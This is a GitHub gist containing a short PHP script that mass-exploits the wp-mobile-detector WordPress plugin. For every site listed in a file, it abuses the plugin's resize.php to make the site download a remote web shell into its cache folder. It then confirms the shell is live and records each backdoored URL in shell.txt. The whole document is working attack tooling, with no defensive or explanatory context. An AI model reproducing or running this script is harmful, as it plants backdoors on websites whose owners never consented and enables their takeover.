Skip to content

Instantly share code, notes, and snippets.

@winstrool

winstrool/gist:28acb84721e99655b2fea087ada4e58b

Created June 7, 2016 08:55
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save winstrool/28acb84721e99655b2fea087ada4e58b to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save winstrool/28acb84721e99655b2fea087ada4e58b to your computer and use it in GitHub Desktop.
Download ZIP

Revisions

  1. winstrool created this gist Jun 7, 2016.
    57 changes: 57 additions & 0 deletions gistfile1.txt
    View file
    Original file line number Diff line number Diff line change
    @@ -0,0 +1,57 @@
    <?php
    set_time_limit(0);
    error_reporting(0);

    $get_url=file('url.txt');
    $shell_url="http://localhost/shell.php";

    function curl($url='', $post='', $referer='', $proxy='')
    {
    $cl = curl_init();
    curl_setopt($cl, CURLOPT_URL, $url);
    curl_setopt($cl, CURLOPT_RETURNTRANSFER,1);
    curl_setopt($cl, CURLOPT_HEADER, 0);
    curl_setopt($cl, CURLOPT_SSL_VERIFYPEER, 0);
    curl_setopt($cl, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt($cl, CURLOPT_USERAGENT, 'Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.2.15 Version/10.10');
    #curl_setopt($cl, CURLOPT_ENCODING, 'gzip, deflate');
    curl_setopt($cl, CURLOPT_COOKIEJAR, $_SERVER['DOCUMENT_ROOT'].'/cookie.txt');
    curl_setopt($cl, CURLOPT_COOKIEFILE, $_SERVER['DOCUMENT_ROOT'].'/cookie.txt');
    if(!empty($post)) {
    curl_setopt($cl, CURLOPT_POST, 1);

    curl_setopt($cl, CURLOPT_POSTFIELDS, $post);}
    else{
    curl_setopt($cl, CURLOPT_POST, 0);}

    if(!empty($referer)){
    curl_setopt($cl, CURLOPT_REFERER, $referer);}
    else{
    curl_setopt($cl,CURLOPT_REFERER, 1);}

    if(!empty($proxy)) {
    curl_setopt($cl, CURLOPT_PROXY, $proxy);}

    $ex=curl_exec($cl);
    #$ex=iconv('cp1251','UTF8',$ex);
    curl_close($cl);
    return $ex;
    }

    for($i=0;$i<count($get_url);$i++){
    curl('http://'.trim($get_url[$i]).'/wp-content/plugins/wp-mobile-detector/resize.php','src='.$shell_url);

    $matches=file_get_contents('http://'.trim($get_url[$i]).'/wp-content/plugins/wp-mobile-detector/cache/shell.php');

    if (preg_match('#input type=password name=pass#', $matches, $o))
    {
    echo $i.':: http://'.trim($get_url[$i])."/wp-content/plugins/wp-mobile-detector/cache/shell.php;pass\n";
    file_put_contents('./shell.txt','http://'.trim($get_url[$i])."/wp-content/plugins/wp-mobile-detector/cache/shell.php;pass\n", FILE_APPEND);
    }

    ob_flush();
    flush();
    }


    ?>